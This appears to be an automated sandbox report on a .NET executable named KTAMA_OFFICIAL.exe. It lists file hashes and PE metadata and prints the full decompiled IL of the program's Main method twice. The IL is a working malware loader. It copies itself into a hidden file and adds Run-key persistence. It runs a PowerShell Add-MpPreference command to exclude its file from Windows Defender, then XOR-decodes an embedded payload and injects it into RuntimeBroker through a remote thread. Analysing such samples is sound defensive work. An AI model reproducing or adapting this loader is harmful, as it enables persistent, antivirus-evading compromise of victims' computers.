Symbol Obfuscation Score
|
Hash | Hash Value |
|---|---|
| MD5 | 2f09b79dd2720e8f888b6c951afeeef7
|
| Sha1 | 96f3caf92a21d052b594d670e1f87cec1a751867
|
| Sha256 | 6a86b3beed4068b73085adefe5be7d97acf1bbb349442243f6ab304641193bb3
|
| Sha384 | 2077bd2d45962bc2e2299bbb20d9a4dfece0c87ecfe365f572176d5e9288b65ba89efefc82ecf755cb706e2bb58894b0
|
| Sha512 | c41a620fdf209c77d6f04ac3b38ab7918c7ed4422a82fb6b7042ae63600b1152dfbdae1873aad09e34b44a3902446f2be40899a8770a60056a26d96fb9fa7642
|
| SSDeep | 3072:VhFtrVH4ZrCIira7bEwjE8wx3s/dEAGGG0Mpc4ltU9x:VLtaZrC9+7bE3rx3s/dEAGs8lq9
|
| TLSH | 07D30183CA5485A2FE7AC931067553501D9ED82F8B6E6F077B6C48AEF22D32930173B4
|
PeID
|
Name0 | Value |
|---|---|
| Info | PE Detect: PeReader OK (file layout) |
| Module Name | KTAMA_OFFICIAL.exe |
| Full Name | KTAMA_OFFICIAL.exe |
| EntryPoint | System.Void 襜窦鳗肩桍榦鍺缜::Main(System.String[]) |
| Scope Name | KTAMA_OFFICIAL.exe |
| Scope Type | ModuleDef |
| Kind | Windows |
| Runtime Version | v4.0.30319 |
| Tables Header Version | 512 |
| WinMD Version | <null> |
| Assembly Name | KTAMA_OFFICIAL |
| Assembly Version | 0.0.0.0 |
| Assembly Culture | <null> |
| Has PublicKey | False |
| PublicKey Token | <null> |
| Target Framework | <null> |
| Total Strings | 9 |
| Main Method | System.Void 襜窦鳗肩桍榦鍺缜::Main(System.String[]) |
| Main IL Instruction Count | 361 |
| Main IL | newobj System.Void 襜窦鳗肩桍榦鍺缜/<>c__DisplayClass5::.ctor() stloc.s V_18 nop <null> nop <null> call System.String System.IO.Path::GetRandomFileName() call System.String System.IO.Path::GetFileNameWithoutExtension(System.String) stloc.0 <null> ldc.i4.s 26 call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) stloc.1 <null> ldloc.1 <null> ldloc.0 <null> call System.String System.Windows.Forms.Application::get_ExecutablePath() call System.String System.IO.Path::GetExtension(System.String) call System.String System.String::Concat(System.String,System.String) call System.String System.IO.Path::Combine(System.String,System.String) stloc.2 <null> call System.String System.Windows.Forms.Application::get_ExecutablePath() ldloc.2 <null> ldc.i4.1 <null> call System.Void System.IO.File::Copy(System.String,System.String,System.Boolean) nop <null> ldloc.2 <null> ldc.i4.6 <null> call System.Void System.IO.File::SetAttributes(System.String,System.IO.FileAttributes) nop <null> ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::CurrentUser ldstr Software\Microsoft\Windows\CurrentVersion\Run ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) stloc.3 <null> nop <null> ldloc.3 <null> ldloc.0 <null> ldloc.2 <null> callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object) nop <null> nop <null> leave.s IL_0078: nop ldloc.3 <null> ldnull <null> ceq <null> stloc.s V_19 ldloc.s V_19 brtrue.s IL_0077: endfinally ldloc.3 <null> callvirt System.Void System.IDisposable::Dispose() nop <null> endfinally <null> nop <null> nop <null> ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::LocalMachine ldstr Software\Microsoft\Windows\CurrentVersion\Run ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) stloc.3 <null> nop <null> ldloc.3 <null> ldloc.0 <null> ldloc.2 <null> callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object) nop <null> nop <null> leave.s IL_00AA: nop ldloc.3 <null> ldnull <null> ceq <null> stloc.s V_19 ldloc.s V_19 brtrue.s IL_00A9: endfinally ldloc.3 <null> callvirt System.Void System.IDisposable::Dispose() nop <null> endfinally <null> nop <null> nop <null> leave.s IL_00B5: nop pop <null> nop <null> nop <null> nop <null> nop <null> leave.s IL_00B5: nop nop <null> nop <null> newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor() stloc.s V_4 ldloc.s V_4 ldstr powershell.exe callvirt System.Void System.Diagnostics.ProcessStartInfo::set_FileName(System.String) nop <null> ldloc.s V_4 ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_WindowStyle(System.Diagnostics.ProcessWindowStyle) nop <null> ldloc.s V_4 ldstr Add-MpPreference -ExclusionPath "{0}" ldloc.2 <null> call System.String System.String::Format(System.String,System.Object) callvirt System.Void System.Diagnostics.ProcessStartInfo::set_Arguments(System.String) nop <null> ldloc.s V_4 call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) callvirt System.Void System.Diagnostics.Process::WaitForExit() nop <null> nop <null> leave.s IL_00FE: nop pop <null> nop <null> nop <null> nop <null> nop <null> leave.s IL_00FE: nop nop <null> nop <null> leave.s IL_0109: nop pop <null> nop <null> nop <null> nop <null> nop <null> leave.s IL_0109: nop nop <null> nop <null> ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::CurrentUser ldstr Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) stloc.3 <null> nop <null> ldloc.3 <null> ldstr ShowSuperHidden ldc.i4.0 <null> box System.Int32 callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object) nop <null> nop <null> leave.s IL_0144: nop ldloc.3 <null> ldnull <null> ceq <null> stloc.s V_19 ldloc.s V_19 brtrue.s IL_0143: endfinally ldloc.3 <null> callvirt System.Void System.IDisposable::Dispose() nop <null> endfinally <null> nop <null> nop <null> leave.s IL_014D: nop pop <null> nop <null> nop <null> leave.s IL_014D: nop nop <null> call System.Boolean System.Net.NetworkInformation.NetworkInterface::GetIsNetworkAvailable() stloc.s V_19 ldloc.s V_19 brtrue.s IL_0161: ldc.i4.s 13 ldc.i4.s 99 call System.Void System.Environment::Exit(System.Int32) nop <null> ldc.i4.s 13 newarr System.Byte dup <null> ldtoken <PrivateImplementationDetails>{08116359-BE42-4D6E-B330-CE6B47C09A43}/__StaticArrayInitTypeSize=13 <PrivateImplementationDetails>{08116359-BE42-4D6E-B330-CE6B47C09A43}::$$method0x6000007-1 call System.Void System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray(System.Array,System.RuntimeFieldHandle) stloc.s V_5 ldloc.s V_18 call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr KTAMA_OFFICIAL callvirt System.Byte[] System.Text.Encoding::GetBytes(System.String) stfld System.Byte[] 襜窦鳗肩桍榦鍺缜/<>c__DisplayClass5::classNameBytes ldstr RuntimeBroker call System.Diagnostics.Process[] System.Diagnostics.Process::GetProcessesByName(System.String) ldloc.s V_18 ldftn System.Boolean 襜窦鳗肩桍榦鍺缜/<>c__DisplayClass5::<Main>b__1(System.Diagnostics.Process) newobj System.Void System.Func`2<System.Diagnostics.Process,System.Boolean>::.ctor(System.Object,System.IntPtr) call System.Boolean System.Linq.Enumerable::Any<System.Diagnostics.Process>(System.Collections.Generic.IEnumerable`1<System.Diagnostics.Process>,System.Func`2<System.Diagnostics.Process,System.Boolean>) stloc.s V_6 ldloc.s V_6 ldc.i4.0 <null> ceq <null> stloc.s V_19 ldloc.s V_19 brtrue.s IL_01BC: ldc.i4 122443 ldc.i4.s 98 call System.Void System.Environment::Exit(System.Int32) nop <null> ldc.i4 122443 newarr System.Byte dup <null> ldtoken <PrivateImplementationDetails>{08116359-BE42-4D6E-B330-CE6B47C09A43}/__StaticArrayInitTypeSize=122443 <PrivateImplementationDetails>{08116359-BE42-4D6E-B330-CE6B47C09A43}::$$method0x6000007-2 call System.Void System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray(System.Array,System.RuntimeFieldHandle) stloc.s V_7 ldc.i4.s 23 stloc.s V_8 ldloc.s V_7 ldlen <null> conv.i4 <null> newarr System.Byte stloc.s V_9 ldc.i4.0 <null> stloc.s V_10 br.s IL_01FB: ldloc.s V_10 ldloc.s V_9 ldloc.s V_10 ldloc.s V_7 ldloc.s V_10 ldelem.u1 <null> ldloc.s V_8 xor <null> conv.u1 <null> stelem.i1 <null> ldloc.s V_10 ldc.i4.1 <null> add <null> stloc.s V_10 ldloc.s V_10 ldloc.s V_7 ldlen <null> conv.i4 <null> clt <null> stloc.s V_19 ldloc.s V_19 brtrue.s IL_01E7: ldloc.s V_9 ldstr RuntimeBroker call System.Diagnostics.Process[] System.Diagnostics.Process::GetProcessesByName(System.String) ldsfld System.Func`2<System.Diagnostics.Process,System.Boolean> 襜窦鳗肩桍榦鍺缜::CS$<>9__CachedAnonymousMethodDelegate4 brtrue.s IL_022D: ldsfld System.Func`2<System.Diagnostics.Process,System.Boolean> 襜窦鳗肩桍榦鍺缜::CS$<>9__CachedAnonymousMethodDelegate4 ldnull <null> ldftn System.Boolean 襜窦鳗肩桍榦鍺缜::<Main>b__3(System.Diagnostics.Process) newobj System.Void System.Func`2<System.Diagnostics.Process,System.Boolean>::.ctor(System.Object,System.IntPtr) stsfld System.Func`2<System.Diagnostics.Process,System.Boolean> 襜窦鳗肩桍榦鍺缜::CS$<>9__CachedAnonymousMethodDelegate4 br.s IL_022D: ldsfld System.Func`2<System.Diagnostics.Process,System.Boolean> 襜窦鳗肩桍榦鍺缜::CS$<>9__CachedAnonymousMethodDelegate4 ldsfld System.Func`2<System.Diagnostics.Process,System.Boolean> 襜窦鳗肩桍榦鍺缜::CS$<>9__CachedAnonymousMethodDelegate4 call System.Diagnostics.Process System.Linq.Enumerable::FirstOrDefault<System.Diagnostics.Process>(System.Collections.Generic.IEnumerable`1<System.Diagnostics.Process>,System.Func`2<System.Diagnostics.Process,System.Boolean>) stloc.s V_11 ldloc.s V_11 ldnull <null> ceq <null> ldc.i4.0 <null> ceq <null> stloc.s V_19 ldloc.s V_19 brtrue.s IL_024E: ldc.i4 1082 ldc.i4.1 <null> call System.Void System.Environment::Exit(System.Int32) nop <null> ldc.i4 1082 ldc.i4.0 <null> ldloc.s V_11 callvirt System.Int32 System.Diagnostics.Process::get_Id() call System.IntPtr 襜窦鳗肩桍榦鍺缜::OpenProcess(System.UInt32,System.Boolean,System.UInt32) stloc.s V_12 ldloc.s V_12 ldsfld System.IntPtr System.IntPtr::Zero call System.Boolean System.IntPtr::op_Equality(System.IntPtr,System.IntPtr) ldc.i4.0 <null> ceq <null> stloc.s V_19 ldloc.s V_19 brtrue.s IL_027E: nop ldc.i4.2 <null> call System.Void System.Environment::Exit(System.Int32) nop <null> nop <null> ldloc.s V_12 ldsfld System.IntPtr System.IntPtr::Zero ldloc.s V_9 ldlen <null> conv.i4 <null> ldc.i4 12288 ldc.i4.4 <null> call System.IntPtr 襜窦鳗肩桍榦鍺缜::VirtualAllocEx(System.IntPtr,System.IntPtr,System.UInt32,System.UInt32,System.UInt32) stloc.s V_13 ldloc.s V_13 ldsfld System.IntPtr System.IntPtr::Zero call System.Boolean System.IntPtr::op_Equality(System.IntPtr,System.IntPtr) ldc.i4.0 <null> ceq <null> stloc.s V_19 ldloc.s V_19 brtrue.s IL_02B3: ldloc.s V_12 ldc.i4.3 <null> call System.Void System.Environment::Exit(System.Int32) nop <null> ldloc.s V_12 ldloc.s V_13 ldloc.s V_9 ldloc.s V_9 ldlen <null> conv.i4 <null> ldloca.s V_14 call System.Boolean 襜窦鳗肩桍榦鍺缜::WriteProcessMemory(System.IntPtr,System.IntPtr,System.Byte[],System.UInt32,System.UInt32&) brfalse.s IL_02D2: ldc.i4.0 ldloc.s V_14 conv.u8 <null> ldloc.s V_9 ldlen <null> conv.i4 <null> conv.i8 <null> ceq <null> br.s IL_02D3: nop ldc.i4.0 <null> nop <null> stloc.s V_19 ldloc.s V_19 brtrue.s IL_02E1: ldloc.s V_12 ldc.i4.4 <null> call System.Void System.Environment::Exit(System.Int32) nop <null> ldloc.s V_12 ldloc.s V_13 ldloc.s V_9 ldlen <null> conv.i4 <null> ldc.i4.s 32 ldloca.s V_15 call System.Boolean 襜窦鳗肩桍榦鍺缜::VirtualProtectEx(System.IntPtr,System.IntPtr,System.UInt32,System.UInt32,System.UInt32&) stloc.s V_19 ldloc.s V_19 brtrue.s IL_02FF: ldloc.s V_12 ldc.i4.5 <null> call System.Void System.Environment::Exit(System.Int32) nop <null> ldloc.s V_12 ldsfld System.IntPtr System.IntPtr::Zero ldc.i4.0 <null> ldloc.s V_13 ldsfld System.IntPtr System.IntPtr::Zero ldc.i4.0 <null> ldloca.s V_16 call System.IntPtr 襜窦鳗肩桍榦鍺缜::CreateRemoteThread(System.IntPtr,System.IntPtr,System.UInt32,System.IntPtr,System.IntPtr,System.UInt32,System.UInt32&) stloc.s V_17 ldloc.s V_17 ldsfld System.IntPtr System.IntPtr::Zero call System.Boolean System.IntPtr::op_Equality(System.IntPtr,System.IntPtr) ldc.i4.0 <null> ceq <null> stloc.s V_19 ldloc.s V_19 brtrue.s IL_0334: ldloc.s V_17 ldc.i4.6 <null> call System.Void System.Environment::Exit(System.Int32) nop <null> ldloc.s V_17 call System.Boolean 襜窦鳗肩桍榦鍺缜::CloseHandle(System.IntPtr) pop <null> nop <null> leave.s IL_034A: nop nop <null> ldloc.s V_12 call System.Boolean 襜窦鳗肩桍榦鍺缜::CloseHandle(System.IntPtr) pop <null> nop <null> endfinally <null> nop <null> nop <null> ret <null> |
| Module Name | KTAMA_OFFICIAL.exe |
| Full Name | KTAMA_OFFICIAL.exe |
| EntryPoint | System.Void 襜窦鳗肩桍榦鍺缜::Main(System.String[]) |
| Scope Name | KTAMA_OFFICIAL.exe |
| Scope Type | ModuleDef |
| Kind | Windows |
| Runtime Version | v4.0.30319 |
| Tables Header Version | 512 |
| WinMD Version | <null> |
| Assembly Name | KTAMA_OFFICIAL |
| Assembly Version | 0.0.0.0 |
| Assembly Culture | <null> |
| Has PublicKey | False |
| PublicKey Token | <null> |
| Target Framework | <null> |
| Total Strings | 9 |
| Main Method | System.Void 襜窦鳗肩桍榦鍺缜::Main(System.String[]) |
| Main IL Instruction Count | 361 |
| Main IL | newobj System.Void 襜窦鳗肩桍榦鍺缜/<>c__DisplayClass5::.ctor() stloc.s V_18 nop <null> nop <null> call System.String System.IO.Path::GetRandomFileName() call System.String System.IO.Path::GetFileNameWithoutExtension(System.String) stloc.0 <null> ldc.i4.s 26 call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) stloc.1 <null> ldloc.1 <null> ldloc.0 <null> call System.String System.Windows.Forms.Application::get_ExecutablePath() call System.String System.IO.Path::GetExtension(System.String) call System.String System.String::Concat(System.String,System.String) call System.String System.IO.Path::Combine(System.String,System.String) stloc.2 <null> call System.String System.Windows.Forms.Application::get_ExecutablePath() ldloc.2 <null> ldc.i4.1 <null> call System.Void System.IO.File::Copy(System.String,System.String,System.Boolean) nop <null> ldloc.2 <null> ldc.i4.6 <null> call System.Void System.IO.File::SetAttributes(System.String,System.IO.FileAttributes) nop <null> ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::CurrentUser ldstr Software\Microsoft\Windows\CurrentVersion\Run ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) stloc.3 <null> nop <null> ldloc.3 <null> ldloc.0 <null> ldloc.2 <null> callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object) nop <null> nop <null> leave.s IL_0078: nop ldloc.3 <null> ldnull <null> ceq <null> stloc.s V_19 ldloc.s V_19 brtrue.s IL_0077: endfinally ldloc.3 <null> callvirt System.Void System.IDisposable::Dispose() nop <null> endfinally <null> nop <null> nop <null> ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::LocalMachine ldstr Software\Microsoft\Windows\CurrentVersion\Run ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) stloc.3 <null> nop <null> ldloc.3 <null> ldloc.0 <null> ldloc.2 <null> callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object) nop <null> nop <null> leave.s IL_00AA: nop ldloc.3 <null> ldnull <null> ceq <null> stloc.s V_19 ldloc.s V_19 brtrue.s IL_00A9: endfinally ldloc.3 <null> callvirt System.Void System.IDisposable::Dispose() nop <null> endfinally <null> nop <null> nop <null> leave.s IL_00B5: nop pop <null> nop <null> nop <null> nop <null> nop <null> leave.s IL_00B5: nop nop <null> nop <null> newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor() stloc.s V_4 ldloc.s V_4 ldstr powershell.exe callvirt System.Void System.Diagnostics.ProcessStartInfo::set_FileName(System.String) nop <null> ldloc.s V_4 ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_WindowStyle(System.Diagnostics.ProcessWindowStyle) nop <null> ldloc.s V_4 ldstr Add-MpPreference -ExclusionPath "{0}" ldloc.2 <null> call System.String System.String::Format(System.String,System.Object) callvirt System.Void System.Diagnostics.ProcessStartInfo::set_Arguments(System.String) nop <null> ldloc.s V_4 call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) callvirt System.Void System.Diagnostics.Process::WaitForExit() nop <null> nop <null> leave.s IL_00FE: nop pop <null> nop <null> nop <null> nop <null> nop <null> leave.s IL_00FE: nop nop <null> nop <null> leave.s IL_0109: nop pop <null> nop <null> nop <null> nop <null> nop <null> leave.s IL_0109: nop nop <null> nop <null> ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::CurrentUser ldstr Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) stloc.3 <null> nop <null> ldloc.3 <null> ldstr ShowSuperHidden ldc.i4.0 <null> box System.Int32 callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object) nop <null> nop <null> leave.s IL_0144: nop ldloc.3 <null> ldnull <null> ceq <null> stloc.s V_19 ldloc.s V_19 brtrue.s IL_0143: endfinally ldloc.3 <null> callvirt System.Void System.IDisposable::Dispose() nop <null> endfinally <null> nop <null> nop <null> leave.s IL_014D: nop pop <null> nop <null> nop <null> leave.s IL_014D: nop nop <null> call System.Boolean System.Net.NetworkInformation.NetworkInterface::GetIsNetworkAvailable() stloc.s V_19 ldloc.s V_19 brtrue.s IL_0161: ldc.i4.s 13 ldc.i4.s 99 call System.Void System.Environment::Exit(System.Int32) nop <null> ldc.i4.s 13 newarr System.Byte dup <null> ldtoken <PrivateImplementationDetails>{08116359-BE42-4D6E-B330-CE6B47C09A43}/__StaticArrayInitTypeSize=13 <PrivateImplementationDetails>{08116359-BE42-4D6E-B330-CE6B47C09A43}::$$method0x6000007-1 call System.Void System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray(System.Array,System.RuntimeFieldHandle) stloc.s V_5 ldloc.s V_18 call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr KTAMA_OFFICIAL callvirt System.Byte[] System.Text.Encoding::GetBytes(System.String) stfld System.Byte[] 襜窦鳗肩桍榦鍺缜/<>c__DisplayClass5::classNameBytes ldstr RuntimeBroker call System.Diagnostics.Process[] System.Diagnostics.Process::GetProcessesByName(System.String) ldloc.s V_18 ldftn System.Boolean 襜窦鳗肩桍榦鍺缜/<>c__DisplayClass5::<Main>b__1(System.Diagnostics.Process) newobj System.Void System.Func`2<System.Diagnostics.Process,System.Boolean>::.ctor(System.Object,System.IntPtr) call System.Boolean System.Linq.Enumerable::Any<System.Diagnostics.Process>(System.Collections.Generic.IEnumerable`1<System.Diagnostics.Process>,System.Func`2<System.Diagnostics.Process,System.Boolean>) stloc.s V_6 ldloc.s V_6 ldc.i4.0 <null> ceq <null> stloc.s V_19 ldloc.s V_19 brtrue.s IL_01BC: ldc.i4 122443 ldc.i4.s 98 call System.Void System.Environment::Exit(System.Int32) nop <null> ldc.i4 122443 newarr System.Byte dup <null> ldtoken <PrivateImplementationDetails>{08116359-BE42-4D6E-B330-CE6B47C09A43}/__StaticArrayInitTypeSize=122443 <PrivateImplementationDetails>{08116359-BE42-4D6E-B330-CE6B47C09A43}::$$method0x6000007-2 call System.Void System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray(System.Array,System.RuntimeFieldHandle) stloc.s V_7 ldc.i4.s 23 stloc.s V_8 ldloc.s V_7 ldlen <null> conv.i4 <null> newarr System.Byte stloc.s V_9 ldc.i4.0 <null> stloc.s V_10 br.s IL_01FB: ldloc.s V_10 ldloc.s V_9 ldloc.s V_10 ldloc.s V_7 ldloc.s V_10 ldelem.u1 <null> ldloc.s V_8 xor <null> conv.u1 <null> stelem.i1 <null> ldloc.s V_10 ldc.i4.1 <null> add <null> stloc.s V_10 ldloc.s V_10 ldloc.s V_7 ldlen <null> conv.i4 <null> clt <null> stloc.s V_19 ldloc.s V_19 brtrue.s IL_01E7: ldloc.s V_9 ldstr RuntimeBroker call System.Diagnostics.Process[] System.Diagnostics.Process::GetProcessesByName(System.String) ldsfld System.Func`2<System.Diagnostics.Process,System.Boolean> 襜窦鳗肩桍榦鍺缜::CS$<>9__CachedAnonymousMethodDelegate4 brtrue.s IL_022D: ldsfld System.Func`2<System.Diagnostics.Process,System.Boolean> 襜窦鳗肩桍榦鍺缜::CS$<>9__CachedAnonymousMethodDelegate4 ldnull <null> ldftn System.Boolean 襜窦鳗肩桍榦鍺缜::<Main>b__3(System.Diagnostics.Process) newobj System.Void System.Func`2<System.Diagnostics.Process,System.Boolean>::.ctor(System.Object,System.IntPtr) stsfld System.Func`2<System.Diagnostics.Process,System.Boolean> 襜窦鳗肩桍榦鍺缜::CS$<>9__CachedAnonymousMethodDelegate4 br.s IL_022D: ldsfld System.Func`2<System.Diagnostics.Process,System.Boolean> 襜窦鳗肩桍榦鍺缜::CS$<>9__CachedAnonymousMethodDelegate4 ldsfld System.Func`2<System.Diagnostics.Process,System.Boolean> 襜窦鳗肩桍榦鍺缜::CS$<>9__CachedAnonymousMethodDelegate4 call System.Diagnostics.Process System.Linq.Enumerable::FirstOrDefault<System.Diagnostics.Process>(System.Collections.Generic.IEnumerable`1<System.Diagnostics.Process>,System.Func`2<System.Diagnostics.Process,System.Boolean>) stloc.s V_11 ldloc.s V_11 ldnull <null> ceq <null> ldc.i4.0 <null> ceq <null> stloc.s V_19 ldloc.s V_19 brtrue.s IL_024E: ldc.i4 1082 ldc.i4.1 <null> call System.Void System.Environment::Exit(System.Int32) nop <null> ldc.i4 1082 ldc.i4.0 <null> ldloc.s V_11 callvirt System.Int32 System.Diagnostics.Process::get_Id() call System.IntPtr 襜窦鳗肩桍榦鍺缜::OpenProcess(System.UInt32,System.Boolean,System.UInt32) stloc.s V_12 ldloc.s V_12 ldsfld System.IntPtr System.IntPtr::Zero call System.Boolean System.IntPtr::op_Equality(System.IntPtr,System.IntPtr) ldc.i4.0 <null> ceq <null> stloc.s V_19 ldloc.s V_19 brtrue.s IL_027E: nop ldc.i4.2 <null> call System.Void System.Environment::Exit(System.Int32) nop <null> nop <null> ldloc.s V_12 ldsfld System.IntPtr System.IntPtr::Zero ldloc.s V_9 ldlen <null> conv.i4 <null> ldc.i4 12288 ldc.i4.4 <null> call System.IntPtr 襜窦鳗肩桍榦鍺缜::VirtualAllocEx(System.IntPtr,System.IntPtr,System.UInt32,System.UInt32,System.UInt32) stloc.s V_13 ldloc.s V_13 ldsfld System.IntPtr System.IntPtr::Zero call System.Boolean System.IntPtr::op_Equality(System.IntPtr,System.IntPtr) ldc.i4.0 <null> ceq <null> stloc.s V_19 ldloc.s V_19 brtrue.s IL_02B3: ldloc.s V_12 ldc.i4.3 <null> call System.Void System.Environment::Exit(System.Int32) nop <null> ldloc.s V_12 ldloc.s V_13 ldloc.s V_9 ldloc.s V_9 ldlen <null> conv.i4 <null> ldloca.s V_14 call System.Boolean 襜窦鳗肩桍榦鍺缜::WriteProcessMemory(System.IntPtr,System.IntPtr,System.Byte[],System.UInt32,System.UInt32&) brfalse.s IL_02D2: ldc.i4.0 ldloc.s V_14 conv.u8 <null> ldloc.s V_9 ldlen <null> conv.i4 <null> conv.i8 <null> ceq <null> br.s IL_02D3: nop ldc.i4.0 <null> nop <null> stloc.s V_19 ldloc.s V_19 brtrue.s IL_02E1: ldloc.s V_12 ldc.i4.4 <null> call System.Void System.Environment::Exit(System.Int32) nop <null> ldloc.s V_12 ldloc.s V_13 ldloc.s V_9 ldlen <null> conv.i4 <null> ldc.i4.s 32 ldloca.s V_15 call System.Boolean 襜窦鳗肩桍榦鍺缜::VirtualProtectEx(System.IntPtr,System.IntPtr,System.UInt32,System.UInt32,System.UInt32&) stloc.s V_19 ldloc.s V_19 brtrue.s IL_02FF: ldloc.s V_12 ldc.i4.5 <null> call System.Void System.Environment::Exit(System.Int32) nop <null> ldloc.s V_12 ldsfld System.IntPtr System.IntPtr::Zero ldc.i4.0 <null> ldloc.s V_13 ldsfld System.IntPtr System.IntPtr::Zero ldc.i4.0 <null> ldloca.s V_16 call System.IntPtr 襜窦鳗肩桍榦鍺缜::CreateRemoteThread(System.IntPtr,System.IntPtr,System.UInt32,System.IntPtr,System.IntPtr,System.UInt32,System.UInt32&) stloc.s V_17 ldloc.s V_17 ldsfld System.IntPtr System.IntPtr::Zero call System.Boolean System.IntPtr::op_Equality(System.IntPtr,System.IntPtr) ldc.i4.0 <null> ceq <null> stloc.s V_19 ldloc.s V_19 brtrue.s IL_0334: ldloc.s V_17 ldc.i4.6 <null> call System.Void System.Environment::Exit(System.Int32) nop <null> ldloc.s V_17 call System.Boolean 襜窦鳗肩桍榦鍺缜::CloseHandle(System.IntPtr) pop <null> nop <null> leave.s IL_034A: nop nop <null> ldloc.s V_12 call System.Boolean 襜窦鳗肩桍榦鍺缜::CloseHandle(System.IntPtr) pop <null> nop <null> endfinally <null> nop <null> nop <null> ret <null> |